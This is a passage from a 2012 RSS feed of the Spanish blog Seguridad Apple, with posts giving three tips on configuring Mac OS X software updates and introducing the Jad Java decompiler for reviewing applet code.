Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-4824119446279449020?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=5K6qX1ZMSdE:qF_VIyRjwJI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=5K6qX1ZMSdE:qF_VIyRjwJI:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=5K6qX1ZMSdE:qF_VIyRjwJI:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/5K6qX1ZMSdE/quedan-4-plazas-para-el-rootedlab-de.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-p4dY7whg6i4/TvRmUTsmp6I/AAAAAAAACwE/9EsLXQUqsmk/s72-c/iPad_forense.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/quedan-4-plazas-para-el-rootedlab-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-2290108102480471453</guid><pubDate>Tue, 07 Feb 2012 06:59:00 +0000</pubDate><atom:updated>2012-02-07T07:59:19.126+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><category domain="http://www.blogger.com/atom/ns#">Actualizaciones</category><category domain="http://www.blogger.com/atom/ns#">3G</category><title>Configuración de actualizaciones en Mac OS X: Tres tips</title><description>&lt;div style="text-align: justify;"&gt;Las actualizaciones de Mac OS X vienen pre-configuradas por defecto para ayudar a los usuarios a que el sistema se encuentre actualizado y parcheados los fallos de seguridad. Sin embargo hay tres aspectos que debes tener presente de las actualizaciones de software que queremos recordarte que pueden afectar al usuario en algún determinado momento.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;1.- "No me ha salido la actualización de seguridad esa que dices que tengo que instalar"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En algunas ocasiones la planificación de actualizaciones puede haberse configurado para buscar semanalmente o directamente se haya deschequeado el selector de buscar actualizaciones. No pasa nada, a parte de configura la planificación desde el botón Panel de &lt;i&gt;&lt;b&gt;Preferencias -&amp;gt; Actualización de Software&lt;/b&gt;&lt;/i&gt;, puedes usar el botón de &lt;i&gt;&lt;b&gt;"Buscar ahora"&lt;/b&gt;&lt;/i&gt; para forzar la comprobación en el momento.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-k8Rs3gl35jE/TzAjuUn49FI/AAAAAAAAC-w/jQ7E-GpBaso/s1600/ConfiguracionUpdate0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-k8Rs3gl35jE/TzAjuUn49FI/AAAAAAAAC-w/jQ7E-GpBaso/s1600/ConfiguracionUpdate0.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Configuración de la planificación de actualizaciones&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;b&gt;2.- "Mi conexión a Internet va muy mal"&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Ten cuidado con la opción de descargar actualizaciones automáticamente que se puede seleccionar el panel de configuración de las búsquedas programadas. Si acostumbras a estar con conexiones &lt;i&gt;&lt;b&gt;3G&lt;/b&gt;&lt;/i&gt;, &lt;i&gt;&lt;b&gt;Edg&lt;/b&gt;&lt;/i&gt;e o de poco ancho de banda, una actualización de software como la de &lt;i&gt;&lt;b&gt;GarageBand&lt;/b&gt;&lt;/i&gt; podría arruinarte un poco el trabajo. Aunque el sistema hace un consumo eficiente de la red, es preferible controlar el proceso de descarga.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-RQB3ex2kUxs/TzDLV_v1RPI/AAAAAAAAC-4/liVjMlJFYX0/s1600/Update_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-RQB3ex2kUxs/TzDLV_v1RPI/AAAAAAAAC-4/liVjMlJFYX0/s1600/Update_4.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Actualizaciones de gran tamaño pueden llegar vía Software Update&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;b&gt;3.- "No sé si en mi equipo está instalado ese parche"&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En cualquier momento puedes repasar las versiones de todos los productos de Apple que hayas descargado, incluso si no lo has hecho vía &lt;i&gt;&lt;b&gt;Software Update&lt;/b&gt;&lt;/i&gt;, y ver las versiones que has ido aplicando y en qué momento, desde el botón de &lt;i&gt;&lt;b&gt;"Software instalado"&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-_XVt6z5IaaU/TzAjtZv2QjI/AAAAAAAAC-o/Q5wrjs2A2oI/s1600/ConfiguracionUpdate_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-_XVt6z5IaaU/TzAjtZv2QjI/AAAAAAAAC-o/Q5wrjs2A2oI/s1600/ConfiguracionUpdate_1.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Software instalado en tu equipo de Apple&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Esperamos que estos tres consejos os hayan venido bien para controlar mejora las actualizaciones de vuestro Mac OS X.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-2290108102480471453?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=lBv13-DXWvs:Vxv-xiPQJuU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=lBv13-DXWvs:Vxv-xiPQJuU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=lBv13-DXWvs:Vxv-xiPQJuU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/lBv13-DXWvs/configuracion-de-actualizaciones-en-mac.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-k8Rs3gl35jE/TzAjuUn49FI/AAAAAAAAC-w/jQ7E-GpBaso/s72-c/ConfiguracionUpdate0.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/configuracion-de-actualizaciones-en-mac.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-5985646934265224933</guid><pubDate>Mon, 06 Feb 2012 07:05:00 +0000</pubDate><atom:updated>2012-02-06T08:05:12.793+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Herramientas</category><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">Ingeniería inversa</category><category domain="http://www.blogger.com/atom/ns#">Ma OS X</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>JAD: Un decompilador de Java para Mac OS X</title><description>&lt;div style="text-align: justify;"&gt;Recientemente ha habido que mirar la seguridad de un &lt;i&gt;&lt;b&gt;Applet Java&lt;/b&gt;&lt;/i&gt;, y ha hecho falta buscar un decompilador que nos permitiera analizar el código fuente original para ver si había algún elemento destacable relativo a la seguridad. Así que ha habido que probar varios, para al final terminar trabajando con &lt;i&gt;&lt;b&gt;Jad&lt;/b&gt;&lt;/i&gt;, una utilidad muy cómoda que ya forma parte de los comandos del sistema en nuestros equipos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Jad&lt;/b&gt;&lt;/i&gt; es un proyecto que programó &lt;i&gt;&lt;b&gt;Pavel Kouznetsov&lt;/b&gt;&lt;/i&gt;, pero que desde el 2001 está abandonado, y hay que buscarlo en mirrors o webs de gente que lo mantiene. En este caso, en &lt;a href="http://www.varaneckas.com/jad"&gt;un mirror&lt;/a&gt; mantenido por &lt;i&gt;&lt;b&gt;Tomas Varaneckas&lt;/b&gt;&lt;/i&gt;, además de versiones para &lt;i&gt;&lt;b&gt;Linux&lt;/b&gt;&lt;/i&gt;, &lt;i&gt;&lt;b&gt;Solaris&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;Windows&lt;/b&gt;&lt;/i&gt; entre otros, es posible acceder a las siguientes versiones para &lt;i&gt;&lt;b&gt;Mac OS X&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;&lt;a href="http://www.varaneckas.com/sites/default/files/jad/jad158g.mac.intel.zip"&gt;Jad 1.5.8g para Mac OS X 10.4.6 (Intel) (170707 bytes) (Con GCC 4.0)&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="http://www.varaneckas.com/sites/default/files/jad/jad158c.mac.powerpc.zip"&gt;Jad 1.5.8c para Mac OS X (Darwin 1.3) (PowerPC) (266264 bytes)&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;a href="http://www.varaneckas.com/sites/default/files/jad/jad157b.mac.powerpc.zip"&gt;Jad 1.5.7b para Mac OS X (Rhapsody 5.3) (PowerPC) &amp;nbsp;(372317 bytes)&lt;/a&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;La versión &lt;i&gt;&lt;b&gt;Jad 1.5.8g&lt;/b&gt;&lt;/i&gt; funciona perfectamente en sistemas &lt;i&gt;&lt;b&gt;Mac OS X Lion 10.7.X&lt;/b&gt;&lt;/i&gt;, así que es probable que en las versiones anteriores también lo haga.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-E5Q6_LQct9E/Ty96F3tt5ZI/AAAAAAAAC-Q/1dk15wh3rXM/s1600/Jad_0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-E5Q6_LQct9E/Ty96F3tt5ZI/AAAAAAAAC-Q/1dk15wh3rXM/s1600/Jad_0.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Código decompilado generado por Jad&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;b&gt;Jad&lt;/b&gt;&lt;/i&gt; es extremadamente sencillo de utilizar y a la vez flexible en los resultados que se quieren generar. Al final, lo que hace es interpretar los &lt;i&gt;&lt;b&gt;bytecodes&lt;/b&gt;&lt;/i&gt; de los ficheros &lt;i&gt;&lt;b&gt;.class&lt;/b&gt;&lt;/i&gt; en lenguaje &lt;i&gt;&lt;b&gt;Java&lt;/b&gt;&lt;/i&gt; de alto nivel, para lo que genera un fichero de salida, por defecto con extensión &lt;i&gt;&lt;b&gt;.jad&lt;/b&gt;&lt;/i&gt;.&amp;nbsp;La forma en la que se quiere generar ese fichero se puede hacer por modificadores, pudiendo elegir desde el tamaño de las constantes alfanuméricas, el formato de la identación o hasta si se quieren las instrucciones de la &lt;i&gt;&lt;b&gt;JVM&lt;/b&gt;&lt;/i&gt; en forma de comentarios para un análisis de ingeniería inversa más profunda.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Un ejemplo rápido con Applet&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sólo como un ejemplo rápido de cómo usar el programa, basta con descargarse un &lt;i&gt;&lt;b&gt;Applet Java&lt;/b&gt;&lt;/i&gt;, en este caso en formato &lt;i&gt;&lt;b&gt;.jar &lt;/b&gt;&lt;/i&gt;(&lt;i&gt;&lt;b&gt;Java Archiver&lt;/b&gt;&lt;/i&gt;) y extraer los ficheros .class de él. Para ello es suficiente con utilizar cualquier descompresor que interprete ficheros &lt;i&gt;&lt;b&gt;pk&lt;/b&gt;&lt;/i&gt;.&amp;nbsp;Una vez extraídos los ficheros &lt;i&gt;&lt;b&gt;.class&lt;/b&gt;&lt;/i&gt;, se puede utilizar &lt;i&gt;&lt;b&gt;Jad&lt;/b&gt;&lt;/i&gt; para generar un fichero &lt;i&gt;&lt;b&gt;.jad&lt;/b&gt;&lt;/i&gt; con el código fuente asociado a cada fichero &lt;i&gt;&lt;b&gt;.class&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uBZmcfwHeUg/Ty96Grk0agI/AAAAAAAAC-U/IckietEAEI8/s1600/JAD_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-uBZmcfwHeUg/Ty96Grk0agI/AAAAAAAAC-U/IckietEAEI8/s640/JAD_1.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Decompilando todos los archivos de un Applet con Jad&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Después, el trabajo es para el analista que deberá ir buscando el hilo por el que empezar a analizar el código fuente del programa. Una opción sencilla es buscar cadenas con &lt;i&gt;&lt;b&gt;grep&lt;/b&gt;&lt;/i&gt; en todos los ficheros &lt;i&gt;&lt;b&gt;.jad&lt;/b&gt;&lt;/i&gt;, para saber dónde se encuentra &lt;i&gt;"la chicha"&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qzJ45AcWNtM/Ty96HLl7h3I/AAAAAAAAC-c/56G30sTb8ZY/s1600/JAD_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-qzJ45AcWNtM/Ty96HLl7h3I/AAAAAAAAC-c/56G30sTb8ZY/s640/JAD_2.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Buscando cadenas en los ficheros decompilados para encontrar la pista&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Al final, &lt;i&gt;&lt;b&gt;Jad&lt;/b&gt;&lt;/i&gt; es una buena utilidad de bolsillo que llevar encima por si nos encontramos un entorno en el que nos haga falta.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-5985646934265224933?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=vs9tF7WIoa0:eEgQAfvb8bQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=vs9tF7WIoa0:eEgQAfvb8bQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=vs9tF7WIoa0:eEgQAfvb8bQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/vs9tF7WIoa0/jad-un-decompilador-de-java-para-mac-os.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-E5Q6_LQct9E/Ty96F3tt5ZI/AAAAAAAAC-Q/1dk15wh3rXM/s72-c/Jad_0.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/jad-un-decompilador-de-java-para-mac-os.html</feedburner:origLink></item></channel></rss>

